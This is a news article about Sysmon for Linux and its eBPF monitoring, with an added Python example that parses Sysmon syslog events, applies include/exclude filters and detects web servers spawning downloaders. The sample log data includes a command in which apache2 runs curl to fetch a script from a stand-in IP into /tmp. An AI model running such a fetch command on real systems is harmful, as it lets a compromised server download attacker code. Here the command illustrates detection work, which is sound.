Microsoft has ported Sysmon to Linux and released it as open source

Microsoft has ported Sysmon, its system-activity monitoring service, to the Linux platform. To observe activity on Linux it uses eBPF, which lets the monitoring handlers run inside the operating-system kernel. The SysinternalsEBPF library is developed separately and contains helper functions for building the BPF handlers that watch for events in the system. The tool's code is released under the MIT license, while the BPF programs are under GPLv2 (a BPF program loaded into the kernel must declare a GPL-compatible license to use the kernel's GPL-only helpers). The packages.microsoft.com repository provides ready-made RPM and DEB packages for the popular Linux distributions.

Sysmon keeps a log with detailed information about process creation and termination, network connections and file operations. Besides the basic data, the log records details that are useful for security investigations: the parent process name, hashes of the contents of executable files, information about the shared libraries that are loaded, the creation/access/modification/deletion times of files, and raw process access to block devices. To limit the volume of recorded data, filters can be configured (as on Windows, in an XML configuration with include/exclude rules per event type). The log is written through the standard syslog facility, one event per line, so it can be shipped and parsed with the usual Linux logging tooling.
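The log lines below are constructed to illustrate the two points above (the event fields that make investigations possible, and include/exclude filtering); this is an added example, not code from Microsoft or from the Sysmon for Linux project. It assumes Sysmon's syslog output is one `<Event>` XML document per line with the Windows-style `<EventData><Data Name="...">` layout, assumes the Windows event IDs (1 ProcessCreate, 3 NetworkConnect, 11 FileCreate) and assumes case-insensitive rule matching; the hosts, IPs, PIDs and hash value are made up.

```python
"""Parse Sysmon-for-Linux events out of syslog lines, reproduce the
include/exclude filter semantics of Sysmon's XML config, and run a
small detection over the parsed events. Added example; sample data is
constructed, not captured from a real host."""
import re
import xml.etree.ElementTree as ET

EVENT_NAMES = {1: "ProcessCreate", 3: "NetworkConnect", 5: "ProcessTerminate",
               11: "FileCreate"}

# Constructed sample syslog lines. Line 5 is an unrelated sshd message to
# show that non-Sysmon lines are skipped. The hash is a placeholder.
SAMPLE_SYSLOG = "\n".join([
    'Oct 14 12:00:01 web1 sysmon: <Event><System><Provider Name="Linux-Sysmon"/>'
    '<EventID>1</EventID><Computer>web1</Computer></System><EventData>'
    '<Data Name="UtcTime">2021-10-14 12:00:01.000</Data>'
    '<Data Name="ProcessId">4242</Data><Data Name="Image">/usr/bin/curl</Data>'
    '<Data Name="CommandLine">curl -s http://198.51.100.7/x.sh</Data>'
    '<Data Name="User">www-data</Data>'
    '<Data Name="Hashes">SHA256=00112233445566778899aabbccddeeff</Data>'
    '<Data Name="ParentProcessId">4100</Data>'
    '<Data Name="ParentImage">/usr/sbin/apache2</Data></EventData></Event>',
    'Oct 14 12:00:01 web1 sysmon: <Event><System><Provider Name="Linux-Sysmon"/>'
    '<EventID>1</EventID><Computer>web1</Computer></System><EventData>'
    '<Data Name="ProcessId">4300</Data><Data Name="Image">/usr/bin/ls</Data>'
    '<Data Name="CommandLine">ls -la</Data><Data Name="User">alice</Data>'
    '<Data Name="ParentProcessId">4290</Data>'
    '<Data Name="ParentImage">/bin/bash</Data></EventData></Event>',
    'Oct 14 12:00:02 web1 sysmon: <Event><System><Provider Name="Linux-Sysmon"/>'
    '<EventID>3</EventID><Computer>web1</Computer></System><EventData>'
    '<Data Name="ProcessId">4242</Data><Data Name="Image">/usr/bin/curl</Data>'
    '<Data Name="Protocol">tcp</Data><Data Name="DestinationIp">198.51.100.7</Data>'
    '<Data Name="DestinationPort">80</Data></EventData></Event>',
    'Oct 14 12:00:02 web1 sysmon: <Event><System><Provider Name="Linux-Sysmon"/>'
    '<EventID>11</EventID><Computer>web1</Computer></System><EventData>'
    '<Data Name="ProcessId">4242</Data><Data Name="Image">/usr/bin/curl</Data>'
    '<Data Name="TargetFilename">/tmp/x.sh</Data></EventData></Event>',
    'Oct 14 12:00:03 web1 sshd[900]: Accepted publickey for alice from 203.0.113.5 port 51022',
])

_EVENT_RE = re.compile(r"(<Event>.*</Event>)\s*$")


def parse_line(line):
    """Return {EventID, <Data Name>: text, ...} for a Sysmon line, else None."""
    m = _EVENT_RE.search(line)
    if not m:
        return None
    root = ET.fromstring(m.group(1))
    event = {"EventID": int(root.findtext("System/EventID"))}
    for d in root.iter("Data"):
        event[d.get("Name")] = d.text or ""
    return event


def parse_syslog(text):
    return [ev for ev in map(parse_line, text.splitlines()) if ev]


def _cond(cond, actual, expected):
    """Sysmon filter conditions; matching assumed case-insensitive as on Windows."""
    a, e = actual.lower(), expected.lower()
    if cond == "is":
        return a == e
    if cond == "is not":
        return a != e
    if cond == "contains":
        return e in a
    if cond == "begin with":
        return a.startswith(e)
    if cond == "end with":
        return a.endswith(e)
    if cond == "image":            # bare image name or full path
        return a == e or a.endswith("/" + e)
    raise ValueError("unknown condition: " + cond)


def event_filter(events, event_id, onmatch, rules):
    """Apply one <EventType onmatch="include|exclude"> block (groupRelation="or").
    rules: list of (field, condition, value). Other event types pass through."""
    kept = []
    for ev in events:
        if ev["EventID"] != event_id:
            kept.append(ev)
            continue
        hit = any(_cond(c, ev.get(f, ""), v) for f, c, v in rules)
        if (onmatch == "include") == hit:
            kept.append(ev)
    return kept


DOWNLOADERS = ("/usr/bin/curl", "/usr/bin/wget")
WEB_SERVERS = ("/usr/sbin/apache2", "/usr/sbin/nginx", "/usr/sbin/httpd")


def web_spawned_downloads(events):
    """ProcessCreate events where a web server spawned a downloader; the
    ParentImage field is what makes this detection possible."""
    return [ev for ev in events if ev["EventID"] == 1
            and ev.get("ParentImage") in WEB_SERVERS
            and ev.get("Image") in DOWNLOADERS]


def related_events(events, pid):
    """Follow a flagged process through its later network and file events."""
    return [ev for ev in events if ev["EventID"] != 1 and ev.get("ProcessId") == pid]


if __name__ == "__main__":
    evs = parse_syslog(SAMPLE_SYSLOG)
    for hit in web_spawned_downloads(evs):
        print("ALERT", hit["ParentImage"], "->", hit["CommandLine"], "hashes", hit["Hashes"])
        for ev in related_events(evs, hit["ProcessId"]):
            print("   ", EVENT_NAMES[ev["EventID"]], ev)
```

`event_filter` mirrors how the XML config is read: an `include` block keeps only matching events of that type, an `exclude` block drops them, and a block never affects other event types. On a busy host the sensible deployment is an `exclude` rule for the noisiest benign parents (the second process-create above) together with `include` rules for network connections to uncommon ports, which keeps syslog volume manageable without losing the parent/child and hash data the investigation needs.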

source: budenet.ru
